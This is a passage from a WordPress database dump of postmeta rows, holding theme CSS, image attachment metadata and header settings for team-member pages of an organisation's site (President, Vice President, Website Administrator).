   -moz-order: 2;\n    -ms-flex-order: 2;\n    order: 2;\n    padding-top: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-entry-content {\n    padding: 20px;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-title {\n    margin: 3px 0 5px;\n    font-size: 20px;\n    line-height: 26px;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-meta {\n    margin: 5px 0 5px;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-excerpt {\n    margin: 15px 0 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-details {\n    margin: 5px 0 10px;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-details.details-type-link {\n    margin-bottom: 2px;\n  }\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid {\n  grid-row-gap: 30px;\n  grid-column-gap: 30px;\n  grid-template-columns: repeat(auto-fill,minmax(,1fr));\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid .double-width {\n  grid-column: span 2;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid,\n.no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid {\n  display: flex;\n  flex-flow: row wrap;\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid .wf-cell,\n.no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid .wf-cell {\n  flex: 1 0 ;\n  max-width: 100%;\n  padding: 15px;\n  box-sizing: border-box;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n  grid-template-columns: repeat(3,1fr);\n  grid-template-rows: auto;\n  grid-column-gap: 30px;\n  grid-row-gap: 30px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .double-width {\n  grid-column: span 2;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell {\n  width: 33.333333333333%;\n  padding: 15px;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n  width: calc(33.333333333333%) * 2;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width:not(.centered-layout-list):not(.content-bg-on) .dt-css-grid {\n  grid-row-gap: 0px;\n}\n@media screen and (max-width: 1199px) {\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(3,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 33.333333333333%;\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n    width: calc(33.333333333333%)*2;\n  }\n}\n@media screen and (max-width: 991px) {\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(2,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 50%;\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n    width: calc(50%)*2;\n  }\n}\n@media screen and (max-width: 767px) {\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(1,1fr);\n  }\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .double-width {\n    grid-column: span 1;\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 100%;\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n    width: calc(100%)*2;\n  }\n}\n\";}'),
(26132,3632,'_edit_lock','1674364099:1'),
(26133,3633,'_wp_attached_file','2023/01/m1.jpg'),
(26134,3633,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:163;s:6:\"height\";i:186;s:4:\"file\";s:14:\"2023/01/m1.jpg\";s:8:\"filesize\";i:8450;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:14:\"m1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:3973;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(26135,3632,'_thumbnail_id','3633'),
(26136,3632,'_edit_last','1'),
(26137,3632,'_dt_sidebar_position','disabled'),
(26138,3632,'_dt_sidebar_widgetarea_id','sidebar_1'),
(26139,3632,'_dt_sidebar_hide_on_mobile','0'),
(26140,3632,'_dt_footer_show','1'),
(26141,3632,'_dt_footer_widgetarea_id','sidebar_2'),
(26142,3632,'_dt_footer_hide_on_mobile','0'),
(26143,3632,'_dt_header_title','fancy'),
(26144,3632,'_dt_header_background','normal'),
(26145,3632,'_dt_header_background_below_slideshow','disabled'),
(26146,3632,'_dt_header_transparent_bg_color_scheme','light'),
(26147,3632,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(26148,3632,'_dt_header_transparent_top_bar_bg_opacity','25'),
(26149,3632,'_dt_header_transparent_bg_color','#000000'),
(26150,3632,'_dt_header_transparent_bg_opacity','50'),
(26151,3632,'_dt_header_disabled_background','normal'),
(26152,3632,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(26153,3632,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(26154,3632,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(26155,3632,'_dt_header_disabled_transparent_bg_color','#000000'),
(26156,3632,'_dt_header_disabled_transparent_bg_opacity','50'),
(26157,3632,'_dt_page_overrides_top_margin',''),
(26158,3632,'_dt_page_overrides_right_margin',''),
(26159,3632,'_dt_page_overrides_bottom_margin',''),
(26160,3632,'_dt_page_overrides_left_margin',''),
(26161,3632,'_dt_mobile_page_padding_top',''),
(26162,3632,'_dt_mobile_page_padding_right',''),
(26163,3632,'_dt_mobile_page_padding_bottom',''),
(26164,3632,'_dt_mobile_page_padding_left',''),
(26165,3632,'_dt_fancy_header_layout_heading',''),
(26166,3632,'_dt_fancy_header_title_aligment','center'),
(26167,3632,'_dt_fancy_header_height','300'),
(26168,3632,'_dt_fancy_header_padding-top','0px'),
(26169,3632,'_dt_fancy_header_padding-bottom','0px'),
(26170,3632,'_dt_fancy_header_breadcrumbs_heading',''),
(26171,3632,'_dt_fancy_header_breadcrumbs','disabled'),
(26172,3632,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(26173,3632,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(26174,3632,'_dt_fancy_header_title_heading',''),
(26175,3632,'_dt_fancy_header_title_mode','custom'),
(26176,3632,'_dt_fancy_header_title','Laxmi Thapa'),
(26177,3632,'_dt_fancy_header_title_font_size','30'),
(26178,3632,'_dt_fancy_header_title_line_height','36'),
(26179,3632,'_dt_fancy_header_text_transform','none'),
(26180,3632,'_dt_fancy_header_title_color_mode','color'),
(26181,3632,'_dt_fancy_header_title_color','#ffffff'),
(26182,3632,'_dt_fancy_header_subtitle_heading',''),
(26183,3632,'_dt_fancy_header_subtitle','President'),
(26184,3632,'_dt_fancy_header_subtitle_font_size','18'),
(26185,3632,'_dt_fancy_header_subtitle_line_height','26'),
(26186,3632,'_dt_fancy_header_subtitle_text_transform','none'),
(26187,3632,'_dt_fancy_header_subtitle_color_mode','color'),
(26188,3632,'_dt_fancy_header_subtitle_color','#ffffff'),
(26189,3632,'_dt_fancy_header_bg_heading',''),
(26190,3632,'_dt_fancy_header_bg_color','#222222'),
(26191,3632,'_dt_fancy_header_bg_image_origin','custom'),
(26192,3632,'_dt_fancy_header_bg_image','a:0:{}'),
(26193,3632,'_dt_fancy_header_bg_repeat','no-repeat'),
(26194,3632,'_dt_fancy_header_bg_position_x','center'),
(26195,3632,'_dt_fancy_header_bg_position_y','center'),
(26196,3632,'_dt_fancy_header_bg_fullscreen','1'),
(26197,3632,'_dt_fancy_header_bg_overlay','0'),
(26198,3632,'_dt_fancy_header_overlay_color','#000'),
(26199,3632,'_dt_fancy_header_bg_overlay_opacity','50'),
(26200,3632,'_dt_fancy_header_scroll_effect','default'),
(26201,3632,'_dt_fancy_header_bg_parallax','0.5'),
(26202,3632,'_dt_fancy_header_responsiveness_heading',''),
(26203,3632,'_dt_fancy_header_responsiveness','disabled'),
(26204,3632,'_dt_fancy_header_responsiveness_switch','778px'),
(26205,3632,'_dt_fancy_header_responsive_height','70'),
(26206,3632,'_dt_fancy_header_responsive_font_size','30'),
(26207,3632,'_dt_fancy_header_responsive_title_line_height','38'),
(26208,3632,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(26209,3632,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(26210,3632,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(26211,3632,'_dt_teammate_options_go_to_single','1'),
(26212,3632,'_dt_teammate_options_position',''),
(26213,3632,'_dt_teammate_options_website',''),
(26214,3632,'_dt_teammate_options_mail',''),
(26215,3632,'_dt_teammate_options_facebook',''),
(26216,3632,'_dt_teammate_options_twitter',''),
(26217,3632,'_dt_teammate_options_dribbble',''),
(26218,3632,'_dt_teammate_options_you-tube',''),
(26219,3632,'_dt_teammate_options_rss',''),
(26220,3632,'_dt_teammate_options_delicious',''),
(26221,3632,'_dt_teammate_options_flickr',''),
(26222,3632,'_dt_teammate_options_lastfm',''),
(26223,3632,'_dt_teammate_options_linkedin',''),
(26224,3632,'_dt_teammate_options_vimeo',''),
(26225,3632,'_dt_teammate_options_tumbler',''),
(26226,3632,'_dt_teammate_options_pinterest',''),
(26227,3632,'_dt_teammate_options_devian',''),
(26228,3632,'_dt_teammate_options_skype',''),
(26229,3632,'_dt_teammate_options_github',''),
(26230,3632,'_dt_teammate_options_instagram',''),
(26231,3632,'_dt_teammate_options_stumbleupon',''),
(26232,3632,'_dt_teammate_options_behance',''),
(26233,3632,'_dt_teammate_options_px-500',''),
(26234,3632,'_dt_teammate_options_tripedvisor',''),
(26235,3632,'_dt_teammate_options_vk',''),
(26236,3632,'_dt_teammate_options_foursquare',''),
(26237,3632,'_dt_teammate_options_xing',''),
(26238,3632,'_dt_teammate_options_weibo',''),
(26239,3632,'_dt_teammate_options_odnoklassniki',''),
(26240,3632,'_dt_teammate_options_research-gate',''),
(26241,3632,'_dt_teammate_options_yelp',''),
(26242,3632,'_dt_teammate_options_blogger',''),
(26243,3632,'_dt_teammate_options_soundcloud',''),
(26244,3632,'_dt_teammate_options_viber',''),
(26245,3632,'_dt_teammate_options_whatsapp',''),
(26246,3632,'_dt_teammate_options_reddit',''),
(26247,3632,'_dt_teammate_options_snapchat',''),
(26248,3632,'_dt_teammate_options_telegram',''),
(26249,3632,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(26250,3634,'_edit_lock','1674364648:1'),
(26251,3636,'_wp_attached_file','2023/01/m2.jpg'),
(26252,3636,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:152;s:6:\"height\";i:195;s:4:\"file\";s:14:\"2023/01/m2.jpg\";s:8:\"filesize\";i:14878;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:14:\"m2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6755;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(26253,3634,'_thumbnail_id','3636'),
(26254,3634,'_edit_last','1'),
(26255,3634,'_dt_sidebar_position','disabled'),
(26256,3634,'_dt_sidebar_widgetarea_id','sidebar_1'),
(26257,3634,'_dt_sidebar_hide_on_mobile','0'),
(26258,3634,'_dt_footer_show','1'),
(26259,3634,'_dt_footer_widgetarea_id','sidebar_2'),
(26260,3634,'_dt_footer_hide_on_mobile','0'),
(26261,3634,'_dt_header_title','fancy'),
(26262,3634,'_dt_header_background','normal'),
(26263,3634,'_dt_header_background_below_slideshow','disabled'),
(26264,3634,'_dt_header_transparent_bg_color_scheme','light'),
(26265,3634,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(26266,3634,'_dt_header_transparent_top_bar_bg_opacity','25'),
(26267,3634,'_dt_header_transparent_bg_color','#000000'),
(26268,3634,'_dt_header_transparent_bg_opacity','50'),
(26269,3634,'_dt_header_disabled_background','normal'),
(26270,3634,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(26271,3634,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(26272,3634,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(26273,3634,'_dt_header_disabled_transparent_bg_color','#000000'),
(26274,3634,'_dt_header_disabled_transparent_bg_opacity','50'),
(26275,3634,'_dt_page_overrides_top_margin',''),
(26276,3634,'_dt_page_overrides_right_margin',''),
(26277,3634,'_dt_page_overrides_bottom_margin',''),
(26278,3634,'_dt_page_overrides_left_margin',''),
(26279,3634,'_dt_mobile_page_padding_top',''),
(26280,3634,'_dt_mobile_page_padding_right',''),
(26281,3634,'_dt_mobile_page_padding_bottom',''),
(26282,3634,'_dt_mobile_page_padding_left',''),
(26283,3634,'_dt_fancy_header_layout_heading',''),
(26284,3634,'_dt_fancy_header_title_aligment','center'),
(26285,3634,'_dt_fancy_header_height','300'),
(26286,3634,'_dt_fancy_header_padding-top','0px'),
(26287,3634,'_dt_fancy_header_padding-bottom','0px'),
(26288,3634,'_dt_fancy_header_breadcrumbs_heading',''),
(26289,3634,'_dt_fancy_header_breadcrumbs','disabled'),
(26290,3634,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(26291,3634,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(26292,3634,'_dt_fancy_header_title_heading',''),
(26293,3634,'_dt_fancy_header_title_mode','custom'),
(26294,3634,'_dt_fancy_header_title','Nicolas Pucino'),
(26295,3634,'_dt_fancy_header_title_font_size','30'),
(26296,3634,'_dt_fancy_header_title_line_height','36'),
(26297,3634,'_dt_fancy_header_text_transform','none'),
(26298,3634,'_dt_fancy_header_title_color_mode','color'),
(26299,3634,'_dt_fancy_header_title_color','#ffffff'),
(26300,3634,'_dt_fancy_header_subtitle_heading',''),
(26301,3634,'_dt_fancy_header_subtitle','Vice President'),
(26302,3634,'_dt_fancy_header_subtitle_font_size','18'),
(26303,3634,'_dt_fancy_header_subtitle_line_height','26'),
(26304,3634,'_dt_fancy_header_subtitle_text_transform','none'),
(26305,3634,'_dt_fancy_header_subtitle_color_mode','color'),
(26306,3634,'_dt_fancy_header_subtitle_color','#ffffff'),
(26307,3634,'_dt_fancy_header_bg_heading',''),
(26308,3634,'_dt_fancy_header_bg_color','#222222'),
(26309,3634,'_dt_fancy_header_bg_image_origin','custom'),
(26310,3634,'_dt_fancy_header_bg_image','a:0:{}'),
(26311,3634,'_dt_fancy_header_bg_repeat','no-repeat'),
(26312,3634,'_dt_fancy_header_bg_position_x','center'),
(26313,3634,'_dt_fancy_header_bg_position_y','center'),
(26314,3634,'_dt_fancy_header_bg_fullscreen','1'),
(26315,3634,'_dt_fancy_header_bg_overlay','0'),
(26316,3634,'_dt_fancy_header_overlay_color','#000'),
(26317,3634,'_dt_fancy_header_bg_overlay_opacity','50'),
(26318,3634,'_dt_fancy_header_scroll_effect','default'),
(26319,3634,'_dt_fancy_header_bg_parallax','0.5'),
(26320,3634,'_dt_fancy_header_responsiveness_heading',''),
(26321,3634,'_dt_fancy_header_responsiveness','disabled'),
(26322,3634,'_dt_fancy_header_responsiveness_switch','778px'),
(26323,3634,'_dt_fancy_header_responsive_height','70'),
(26324,3634,'_dt_fancy_header_responsive_font_size','30'),
(26325,3634,'_dt_fancy_header_responsive_title_line_height','38'),
(26326,3634,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(26327,3634,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(26328,3634,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(26329,3634,'_dt_teammate_options_go_to_single','1'),
(26330,3634,'_dt_teammate_options_position',''),
(26331,3634,'_dt_teammate_options_website',''),
(26332,3634,'_dt_teammate_options_mail',''),
(26333,3634,'_dt_teammate_options_facebook',''),
(26334,3634,'_dt_teammate_options_twitter',''),
(26335,3634,'_dt_teammate_options_dribbble',''),
(26336,3634,'_dt_teammate_options_you-tube',''),
(26337,3634,'_dt_teammate_options_rss',''),
(26338,3634,'_dt_teammate_options_delicious',''),
(26339,3634,'_dt_teammate_options_flickr',''),
(26340,3634,'_dt_teammate_options_lastfm',''),
(26341,3634,'_dt_teammate_options_linkedin',''),
(26342,3634,'_dt_teammate_options_vimeo',''),
(26343,3634,'_dt_teammate_options_tumbler',''),
(26344,3634,'_dt_teammate_options_pinterest',''),
(26345,3634,'_dt_teammate_options_devian',''),
(26346,3634,'_dt_teammate_options_skype',''),
(26347,3634,'_dt_teammate_options_github',''),
(26348,3634,'_dt_teammate_options_instagram',''),
(26349,3634,'_dt_teammate_options_stumbleupon',''),
(26350,3634,'_dt_teammate_options_behance',''),
(26351,3634,'_dt_teammate_options_px-500',''),
(26352,3634,'_dt_teammate_options_tripedvisor',''),
(26353,3634,'_dt_teammate_options_vk',''),
(26354,3634,'_dt_teammate_options_foursquare',''),
(26355,3634,'_dt_teammate_options_xing',''),
(26356,3634,'_dt_teammate_options_weibo',''),
(26357,3634,'_dt_teammate_options_odnoklassniki',''),
(26358,3634,'_dt_teammate_options_research-gate',''),
(26359,3634,'_dt_teammate_options_yelp',''),
(26360,3634,'_dt_teammate_options_blogger',''),
(26361,3634,'_dt_teammate_options_soundcloud',''),
(26362,3634,'_dt_teammate_options_viber',''),
(26363,3634,'_dt_teammate_options_whatsapp',''),
(26364,3634,'_dt_teammate_options_reddit',''),
(26365,3634,'_dt_teammate_options_snapchat',''),
(26366,3634,'_dt_teammate_options_telegram',''),
(26367,3634,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(26368,3637,'_edit_lock','1674365349:1'),
(26369,3638,'_wp_attached_file','2023/01/m3.jpg'),
(26370,3638,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:153;s:6:\"height\";i:196;s:4:\"file\";s:14:\"2023/01/m3.jpg\";s:8:\"filesize\";i:9666;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:14:\"m3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4293;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(26371,3637,'_thumbnail_id','3638'),
(26372,3637,'_edit_last','1'),
(26373,3637,'_dt_sidebar_position','disabled'),
(26374,3637,'_dt_sidebar_widgetarea_id','sidebar_1'),
(26375,3637,'_dt_sidebar_hide_on_mobile','0'),
(26376,3637,'_dt_footer_show','1'),
(26377,3637,'_dt_footer_widgetarea_id','sidebar_2'),
(26378,3637,'_dt_footer_hide_on_mobile','0'),
(26379,3637,'_dt_header_title','fancy'),
(26380,3637,'_dt_header_background','normal'),
(26381,3637,'_dt_header_background_below_slideshow','disabled'),
(26382,3637,'_dt_header_transparent_bg_color_scheme','light'),
(26383,3637,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(26384,3637,'_dt_header_transparent_top_bar_bg_opacity','25'),
(26385,3637,'_dt_header_transparent_bg_color','#000000'),
(26386,3637,'_dt_header_transparent_bg_opacity','50'),
(26387,3637,'_dt_header_disabled_background','normal'),
(26388,3637,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(26389,3637,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(26390,3637,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(26391,3637,'_dt_header_disabled_transparent_bg_color','#000000'),
(26392,3637,'_dt_header_disabled_transparent_bg_opacity','50'),
(26393,3637,'_dt_page_overrides_top_margin',''),
(26394,3637,'_dt_page_overrides_right_margin',''),
(26395,3637,'_dt_page_overrides_bottom_margin',''),
(26396,3637,'_dt_page_overrides_left_margin',''),
(26397,3637,'_dt_mobile_page_padding_top',''),
(26398,3637,'_dt_mobile_page_padding_right',''),
(26399,3637,'_dt_mobile_page_padding_bottom',''),
(26400,3637,'_dt_mobile_page_padding_left',''),
(26401,3637,'_dt_fancy_header_layout_heading',''),
(26402,3637,'_dt_fancy_header_title_aligment','center'),
(26403,3637,'_dt_fancy_header_height','300'),
(26404,3637,'_dt_fancy_header_padding-top','0px'),
(26405,3637,'_dt_fancy_header_padding-bottom','0px'),
(26406,3637,'_dt_fancy_header_breadcrumbs_heading',''),
(26407,3637,'_dt_fancy_header_breadcrumbs','disabled'),
(26408,3637,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(26409,3637,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(26410,3637,'_dt_fancy_header_title_heading',''),
(26411,3637,'_dt_fancy_header_title_mode','custom'),
(26412,3637,'_dt_fancy_header_title','Yogender Yadav'),
(26413,3637,'_dt_fancy_header_title_font_size','30'),
(26414,3637,'_dt_fancy_header_title_line_height','36'),
(26415,3637,'_dt_fancy_header_text_transform','none'),
(26416,3637,'_dt_fancy_header_title_color_mode','color'),
(26417,3637,'_dt_fancy_header_title_color','#ffffff'),
(26418,3637,'_dt_fancy_header_subtitle_heading',''),
(26419,3637,'_dt_fancy_header_subtitle','Website Administrator'),
(26420,3637,'_dt_fancy_header_subtitle_font_size','18'),
(26421,3637,'_dt_fancy_header_subtitle_line_height','26'),
(26422,3637,'_dt_fancy_header_subtitle_text_transform','none'),
(26423,3637,'_dt_fancy_header_subtitle_color_mode','color'),
(26424,3637,'_dt_fancy_header_subtitle_color','#ffffff'),
(26425,3637,'_dt_fancy_header_bg_heading',''),
(26426,3637,'_dt_fancy_header_bg_color','#222222'),
